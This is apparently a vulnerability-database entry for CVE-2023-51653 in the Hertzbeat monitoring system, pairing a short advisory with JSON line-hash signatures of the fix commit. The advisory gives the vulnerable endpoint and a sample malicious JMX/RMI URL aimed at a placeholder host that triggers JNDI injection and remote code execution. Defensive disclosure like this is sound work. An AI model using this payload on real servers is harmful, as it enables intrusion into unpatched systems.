Hertzbeat is a real-time monitoring system. In the implementation of JmxCollectImpl.java, JMXConnectorFactory.connect is vulnerable to JNDI injection. The corresponding interface is /api/monitor/detect. If there is a URL field, the address will be used by default. When the URL is service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari, it can be exploited to cause remote code execution. Version 1.4.1 contains a fix for this issue.
{
"cwe_ids": [
"CWE-74"
]
}[
{
"source": "https://github.com/apache/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef",
"target": {
"file": "manager/src/test/java/org/dromara/hertzbeat/manager/ManagerTest.java"
},
"id": "CVE-2023-51653-5b958431",
"signature_type": "Line",
"signature_version": "v1",
"digest": {
"line_hashes": [
"264279008644784699418262652804059537501",
"120875596640835542397776868398116045597",
"258285404286298889403575575821793570720",
"223442173927715700071049849052723039320",
"241547360121169751654130154391421850187"
],
"threshold": 0.9
},
"deprecated": false
},
{
"source": "https://github.com/apache/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef",
"target": {
"file": "manager/src/main/java/org/dromara/hertzbeat/manager/Manager.java"
},
"id": "CVE-2023-51653-940e8114",
"signature_type": "Line",
"signature_version": "v1",
"digest": {
"line_hashes": [
"49489112521453334568809327732723880647",
"263277418407213638113615125776491577487",
"228502565011704919551309078278297924678",
"245678312694703467187201074791054919190",
"159116424457122217288363013303652569906",
"319477453200846306053542726919463989972",
"126038040553103131459172119496479495339"
],
"threshold": 0.9
},
"deprecated": false
}
]